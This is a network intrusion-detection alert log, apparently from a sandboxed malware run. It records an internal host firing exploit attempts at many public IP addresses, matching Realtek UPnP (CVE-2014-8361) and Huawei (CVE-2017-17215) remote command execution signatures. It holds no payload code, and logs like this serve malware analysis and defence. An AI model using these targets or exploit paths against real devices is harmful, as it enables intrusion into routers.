                                                07/20/24-23:06:01.433779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4607252869192.168.2.148.51.102.139
                                                07/20/24-23:06:02.750574TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614070252869192.168.2.14148.1.223.175
                                                07/20/24-23:05:45.468009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5943237215192.168.2.1441.24.123.170
                                                07/20/24-23:05:57.916554TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5316652869192.168.2.14124.138.24.130
                                                07/20/24-23:06:14.472907TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5082452869192.168.2.14193.57.224.82
                                                07/20/24-23:05:39.809666TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5867052869192.168.2.14205.187.149.67
                                                07/20/24-23:05:38.951134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3519837215192.168.2.1441.91.188.103
                                                07/20/24-23:05:44.721858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3417652869192.168.2.14120.138.189.24
                                                07/20/24-23:05:45.374653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032437215192.168.2.14114.53.139.106
                                                07/20/24-23:05:36.323651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781637215192.168.2.14209.16.9.12
                                                07/20/24-23:05:45.805358TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615623452869192.168.2.1420.184.51.228
                                                07/20/24-23:05:59.136809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4058052869192.168.2.1438.235.221.67
                                                07/20/24-23:06:16.328595TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6011652869192.168.2.14132.53.183.184
                                                07/20/24-23:06:19.817334TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614318252869192.168.2.1459.77.93.94
                                                07/20/24-23:06:07.408178TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5057852869192.168.2.14218.24.116.194
                                                07/20/24-23:06:16.731750TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4319452869192.168.2.1465.219.192.0
                                                07/20/24-23:05:37.493636TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25298652869192.168.2.14205.35.169.26
                                                07/20/24-23:05:50.576749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420837215192.168.2.14157.101.149.206
                                                07/20/24-23:05:50.479091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144037215192.168.2.14157.93.141.29
                                                07/20/24-23:05:36.328888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3884637215192.168.2.1425.142.145.178
                                                07/20/24-23:06:39.471724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5843852869192.168.2.14150.193.47.116
                                                07/20/24-23:05:47.054544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900437215192.168.2.1464.3.195.4
                                                07/20/24-23:05:37.527690TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26081452869192.168.2.14106.140.193.219
                                                07/20/24-23:05:47.125782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917437215192.168.2.14157.164.188.99
                                                07/20/24-23:05:58.899974TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3808252869192.168.2.1446.189.159.251
                                                07/20/24-23:05:57.787088TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616085652869192.168.2.14169.123.145.142
                                                07/20/24-23:05:36.268733TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613365252869192.168.2.1479.15.211.18
                                                07/20/24-23:05:35.797336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3817652869192.168.2.1459.242.125.217
                                                07/20/24-23:06:32.540944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5027252869192.168.2.14222.225.200.134
                                                07/20/24-23:05:57.592012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3653252869192.168.2.1468.106.50.107
                                                07/20/24-23:05:58.880153TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614634052869192.168.2.14101.212.53.40
                                                07/20/24-23:06:20.035971TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5622452869192.168.2.1440.173.149.130
                                                07/20/24-23:05:35.473003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5150452869192.168.2.14205.35.169.26
                                                07/20/24-23:06:00.171719TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23438252869192.168.2.1435.126.110.108
                                                07/20/24-23:06:00.196025TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3647252869192.168.2.1471.185.114.186
                                                07/20/24-23:05:40.347403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3506652869192.168.2.14114.38.170.24
                                                07/20/24-23:05:38.737127TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613303452869192.168.2.1431.209.91.245
                                                07/20/24-23:05:56.696368TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4605252869192.168.2.14175.105.64.16
                                                07/20/24-23:05:38.578706TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613370652869192.168.2.14206.209.134.255
                                                07/20/24-23:05:47.107735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855837215192.168.2.14110.192.170.234
                                                07/20/24-23:05:58.818179TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613922452869192.168.2.1442.223.143.55
                                                07/20/24-23:06:54.322182TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6038652869192.168.2.14128.90.178.16
                                                07/20/24-23:05:35.563341TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614491652869192.168.2.1462.135.228.95
                                                07/20/24-23:05:42.136712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800837215192.168.2.1441.75.49.25
                                                07/20/24-23:05:36.343227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302037215192.168.2.14197.32.40.48
                                                07/20/24-23:05:52.507639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3872452869192.168.2.14106.251.202.103
                                                07/20/24-23:05:48.841499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5309637215192.168.2.14116.90.202.150
                                                07/20/24-23:06:01.433779TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25193252869192.168.2.1423.28.207.2
                                                07/20/24-23:06:04.568777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24981652869192.168.2.14217.15.90.132
                                                07/20/24-23:05:40.433285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5031852869192.168.2.14159.176.16.130
                                                07/20/24-23:06:19.742051TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616032452869192.168.2.14119.105.96.108
                                                07/20/24-23:05:57.906796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614822052869192.168.2.1478.254.150.241
                                                07/20/24-23:05:39.067591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155437215192.168.2.1441.84.68.83
                                                07/20/24-23:05:45.414465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5247437215192.168.2.14198.41.203.180
                                                07/20/24-23:05:59.265746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5008452869192.168.2.14218.51.16.69
                                                07/20/24-23:06:02.672606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4685652869192.168.2.1468.185.233.236
                                                07/20/24-23:05:45.439167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272237215192.168.2.14197.182.37.170
                                                07/20/24-23:05:37.493635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4372052869192.168.2.14154.64.178.0
                                                07/20/24-23:05:56.227561TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614675052869192.168.2.1492.115.168.51
                                                07/20/24-23:05:56.058256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5932637215192.168.2.1449.154.62.137
                                                07/20/24-23:06:27.421231TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613419052869192.168.2.1431.100.120.188
                                                07/20/24-23:05:36.528872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348437215192.168.2.14197.80.137.234
                                                07/20/24-23:06:05.139331TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3612252869192.168.2.144.180.124.77
                                                07/20/24-23:05:57.566382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5039452869192.168.2.14153.2.64.76
                                                07/20/24-23:06:09.698680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6021252869192.168.2.14180.99.90.112
                                                07/20/24-23:05:39.677505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5366437215192.168.2.1441.37.37.234
                                                07/20/24-23:06:01.297065TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4301852869192.168.2.1477.116.6.110
                                                07/20/24-23:05:48.763322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6075837215192.168.2.14197.95.27.27
                                                07/20/24-23:06:08.966438TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5484852869192.168.2.14174.211.51.160
                                                07/20/24-23:05:50.576749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188037215192.168.2.1441.130.74.21
                                                07/20/24-23:05:34.657123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255037215192.168.2.1441.206.29.121
                                                07/20/24-23:05:57.158457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5032652869192.168.2.14148.121.201.0
                                                07/20/24-23:06:16.651508TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615151452869192.168.2.1459.38.213.21
                                                07/20/24-23:05:46.113321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5838837215192.168.2.14108.195.38.35
                                                07/20/24-23:05:52.493809TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24940052869192.168.2.14223.116.88.128
                                                07/20/24-23:05:48.795527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769237215192.168.2.14182.202.169.238
                                                07/20/24-23:05:39.376131TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614918052869192.168.2.1467.159.158.152
                                                07/20/24-23:05:47.129772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5138837215192.168.2.14157.121.114.20
                                                07/20/24-23:05:40.361541TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5485452869192.168.2.14208.42.152.137
                                                07/20/24-23:05:50.555898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623837215192.168.2.14108.243.78.89
                                                07/20/24-23:05:59.251572TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615803652869192.168.2.1432.171.130.180
                                                07/20/24-23:05:48.805828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875637215192.168.2.1441.114.68.226
                                                07/20/24-23:06:00.607400TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4055252869192.168.2.14189.67.163.117
                                                07/20/24-23:05:40.488770TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4045852869192.168.2.14219.185.28.245
                                                07/20/24-23:06:08.816643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3837652869192.168.2.14115.251.64.117
                                                07/20/24-23:05:38.747119TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4522452869192.168.2.14121.140.37.67
                                                07/20/24-23:05:57.062143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3961452869192.168.2.14159.241.80.83
                                                07/20/24-23:05:40.371348TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4790652869192.168.2.14194.209.238.48
                                                07/20/24-23:06:19.887734TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614080852869192.168.2.14216.53.244.127
                                                07/20/24-23:05:38.705914TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613596652869192.168.2.14121.139.236.213
                                                07/20/24-23:05:34.648426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975637215192.168.2.14157.12.154.103
                                                07/20/24-23:05:42.136712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990437215192.168.2.14157.28.72.8
                                                07/20/24-23:05:42.269493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709637215192.168.2.1450.120.242.79
                                                07/20/24-23:05:59.046185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3478452869192.168.2.144.4.30.157
                                                07/20/24-23:06:02.646553TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5463652869192.168.2.1458.94.23.51
                                                07/20/24-23:06:29.960598TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4048852869192.168.2.14223.241.242.252
                                                07/20/24-23:06:01.176056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5015652869192.168.2.1481.98.194.221
                                                07/20/24-23:07:08.228937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614147852869192.168.2.14206.104.221.174
                                                07/20/24-23:05:35.551930TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613712852869192.168.2.14178.154.163.217
                                                07/20/24-23:06:29.347952TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25300652869192.168.2.14203.91.112.188
                                                07/20/24-23:05:57.432998TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25584052869192.168.2.14145.10.65.112
                                                07/20/24-23:06:01.813206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5192652869192.168.2.14165.79.131.219
                                                07/20/24-23:06:08.228618TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3927452869192.168.2.1497.37.34.141
                                                07/20/24-23:07:16.958571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3458852869192.168.2.1476.98.41.108
                                                07/20/24-23:05:35.469824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614648452869192.168.2.14141.0.4.62
                                                07/20/24-23:06:10.600919TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23541652869192.168.2.14194.77.230.54
                                                07/20/24-23:06:17.501695TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613964252869192.168.2.14216.88.74.6
                                                07/20/24-23:05:57.180627TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3297652869192.168.2.1443.249.97.34
                                                07/20/24-23:05:35.901932TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614928052869192.168.2.1458.236.61.29
                                                07/20/24-23:05:40.462607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6073652869192.168.2.1424.160.46.49
                                                07/20/24-23:05:42.226828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912637215192.168.2.14197.179.172.201
                                                07/20/24-23:05:37.472706TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25518052869192.168.2.1427.129.79.40
                                                07/20/24-23:05:36.338927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228637215192.168.2.14197.245.218.40
                                                07/20/24-23:05:45.258139TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615068452869192.168.2.14183.224.136.118
                                                07/20/24-23:06:13.586481TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615538252869192.168.2.14217.27.61.129
                                                07/20/24-23:06:06.062295TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615117452869192.168.2.1488.174.31.158
                                                07/20/24-23:05:52.450049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5486852869192.168.2.14163.111.67.44
                                                07/20/24-23:05:35.422821TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614557652869192.168.2.14173.175.30.8
                                                07/20/24-23:06:31.047147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5101052869192.168.2.14160.32.94.148
                                                07/20/24-23:06:04.439088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3740652869192.168.2.1449.163.219.249
                                                07/20/24-23:05:56.994605TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4301452869192.168.2.14130.194.61.21
                                                07/20/24-23:05:35.273631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3359852869192.168.2.14189.230.165.186
                                                07/20/24-23:05:57.587244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614762452869192.168.2.1498.41.122.243
                                                07/20/24-23:06:01.105390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4483652869192.168.2.14198.213.67.23
                                                07/20/24-23:06:44.371373TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615383252869192.168.2.14216.251.94.215
                                                07/20/24-23:05:35.325929TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4236252869192.168.2.1452.248.88.164
                                                07/20/24-23:06:06.027833TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5271452869192.168.2.1483.207.51.198
                                                07/20/24-23:06:14.884095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613993052869192.168.2.1463.202.197.142
                                                07/20/24-23:05:52.526129TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24996852869192.168.2.14130.125.245.169
                                                07/20/24-23:05:47.105578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937837215192.168.2.1441.254.62.150
                                                07/20/24-23:05:36.343227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272837215192.168.2.14157.196.176.114
                                                07/20/24-23:05:56.318882TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613806452869192.168.2.14142.8.237.197
                                                07/20/24-23:06:33.244498TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614077452869192.168.2.14210.223.197.178
                                                07/20/24-23:05:39.898078TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615171452869192.168.2.14113.16.251.217
                                                07/20/24-23:06:13.745204TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613647252869192.168.2.1420.132.200.6
                                                07/20/24-23:05:45.838207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4004252869192.168.2.14175.10.5.126
                                                07/20/24-23:06:19.714340TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615260652869192.168.2.14141.143.83.70
                                                07/20/24-23:05:35.977626TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4490252869192.168.2.14116.137.1.46
                                                07/20/24-23:05:38.713445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4627652869192.168.2.1459.16.3.2
                                                07/20/24-23:06:17.539924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744837215192.168.2.14157.94.71.127
                                                07/20/24-23:05:39.924564TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614466452869192.168.2.1427.37.230.189
                                                07/20/24-23:06:01.318185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4757452869192.168.2.14130.9.41.235
                                                07/20/24-23:05:38.971654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4719437215192.168.2.14197.195.33.211
                                                07/20/24-23:05:57.114018TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3642652869192.168.2.14209.32.151.5
                                                07/20/24-23:05:50.542034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297637215192.168.2.1441.2.22.176
                                                07/20/24-23:05:40.339812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4017852869192.168.2.14144.76.154.113
                                                07/20/24-23:05:47.716986TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615723452869192.168.2.1434.93.140.173
                                                07/20/24-23:06:01.244494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4148852869192.168.2.14133.192.223.98
                                                07/20/24-23:05:59.339081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4365452869192.168.2.1448.252.151.54
                                                07/20/24-23:05:57.029235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4995452869192.168.2.1459.6.13.116
                                                07/20/24-23:05:37.449942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25854652869192.168.2.1472.58.64.100
                                                07/20/24-23:05:57.619304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5043852869192.168.2.1431.186.230.47
                                                07/20/24-23:05:56.285994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105637215192.168.2.14197.106.37.199
                                                07/20/24-23:05:56.400670TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3969452869192.168.2.14201.191.195.148
                                                07/20/24-23:06:02.442542TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614382252869192.168.2.14122.129.207.148
                                                07/20/24-23:07:03.257276TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613410452869192.168.2.1425.201.244.222
                                                07/20/24-23:05:47.775474TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615352252869192.168.2.14104.253.137.229
                                                07/20/24-23:05:58.149825TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3559852869192.168.2.14100.5.198.48
                                                07/20/24-23:06:35.442399TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616067452869192.168.2.14179.170.99.171
                                                07/20/24-23:05:56.056582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478237215192.168.2.1439.111.205.169
                                                07/20/24-23:05:57.133659TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4594852869192.168.2.1499.108.70.8
                                                07/20/24-23:05:46.800280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4512852869192.168.2.14156.215.77.129
                                                07/20/24-23:05:33.861759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817637215192.168.2.1441.212.142.21
                                                07/20/24-23:06:00.233230TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615102052869192.168.2.1420.92.79.193
                                                07/20/24-23:05:57.445836TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25899652869192.168.2.1467.226.93.72
                                                07/20/24-23:05:36.324297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615837215192.168.2.14157.223.162.148
                                                07/20/24-23:05:37.443569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4206452869192.168.2.1495.188.72.113
                                                07/20/24-23:06:45.487764TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615482052869192.168.2.14123.181.87.233
                                                07/20/24-23:06:01.851986TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5555052869192.168.2.1462.44.228.192
                                                07/20/24-23:05:37.457748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4925252869192.168.2.14200.238.182.46
                                                07/20/24-23:05:36.574960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859437215192.168.2.1441.114.157.137
                                                07/20/24-23:05:40.457644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25108652869192.168.2.1477.83.231.0
                                                07/20/24-23:05:42.136712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539637215192.168.2.1441.33.186.151
                                                07/20/24-23:05:36.013470TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615800652869192.168.2.1459.165.217.161
                                                07/20/24-23:05:57.152960TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3717252869192.168.2.14193.66.175.30
